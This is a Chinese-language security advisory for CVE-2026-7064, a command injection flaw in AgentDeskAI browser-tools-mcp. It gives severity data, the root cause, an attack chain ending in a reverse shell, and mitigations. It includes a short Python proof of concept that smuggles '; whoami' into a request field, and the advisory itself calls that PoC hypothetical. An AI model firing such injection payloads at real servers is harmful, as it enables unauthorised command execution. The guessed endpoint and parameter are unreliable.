CVE-2026-7064 CVSS 7.3 高危

CVE-2026-7064 AgentDeskAI 命令注入漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7064

漏洞类型

操作系统命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AgentDeskAI browser-tools-mcp

漏洞概述

AgentDeskAI browser-tools-mcp 1.2.0及之前版本存在严重的操作系统命令注入漏洞。漏洞位于`browser-tools-server/browser-connector.ts`文件的处理逻辑中。攻击者可利用该缺陷，在无需认证和交互的情况下，通过远程网络请求注入并执行任意操作系统命令，进而控制服务器。目前厂商尚未对此做出响应，且利用代码已被公开披露。

技术细节

该漏洞根因在于AgentDeskAI browser-tools-mcp组件中的`browser-tools-server/browser-connector.ts`文件未对用户输入进行严格校验。在处理特定请求时，程序直接将外部可控数据拼接到系统命令执行函数中。攻击者无需身份验证，即可通过网络向受影响接口发送特制的数据包。由于底层执行环境未能隔离命令上下文，攻击者注入的分隔符（如;、|）或替换命令（如$()）将被操作系统解析，从而导致任意命令执行。这可能允许攻击者获取服务器权限、窃取数据或部署恶意软件。

攻击链分析

STEP 1

侦察阶段

攻击者扫描互联网寻找暴露的AgentDeskAI browser-tools-mcp服务。

STEP 2

漏洞利用

攻击者向`browser-tools-server/browser-connector.ts`对应的接口发送特制的恶意数据包，其中包含操作系统命令注入Payload。

STEP 3

命令执行

服务器端程序未能过滤Payload，将其传递给系统Shell执行，导致攻击者的命令在服务器上运行。

STEP 4

后渗透

攻击者利用执行命令的权限建立反向Shell，窃取敏感数据或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Hypothetical based on vulnerability description)
target_url = "http://target-ip:port/mcp-connector"

# Malicious payload to execute 'whoami' command
payload = "; whoami"

# Data structure that might be vulnerable in browser-connector.ts
# Example: sending a command or path parameter
vulnerable_data = {
    "tool": "browse",
    "url": payload  # Assuming this parameter is passed unsanitized to exec
}

try:
    response = requests.post(target_url, json=vulnerable_data)
    print("Status Code:", response.status_code)
    print("Response:", response.text)
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

AgentDeskAI browser-tools-mcp <= 1.2.0

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议用户暂时停止部署或使用AgentDeskAI browser-tools-mcp组件。如果必须使用，应在防火墙层面严格限制访问来源，并检查日志中是否存在异常的命令执行记录。开发者应立即审查`browser-connector.ts`文件，移除或修复直接调用Shell命令的相关代码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7064
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7064
3 Details https://www.cvedetails.com/cve/CVE-2026-7064/
4 VulDB https://vuldb.com/cve/CVE-2026-7064
5 Link https://github.com/AgentDeskAI/browser-tools-mcp/
6 Link https://github.com/AgentDeskAI/browser-tools-mcp/issues/232
7 Link https://vuldb.com/submit/798616
8 Link https://vuldb.com/vuln/359639
9 Link https://vuldb.com/vuln/359639/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表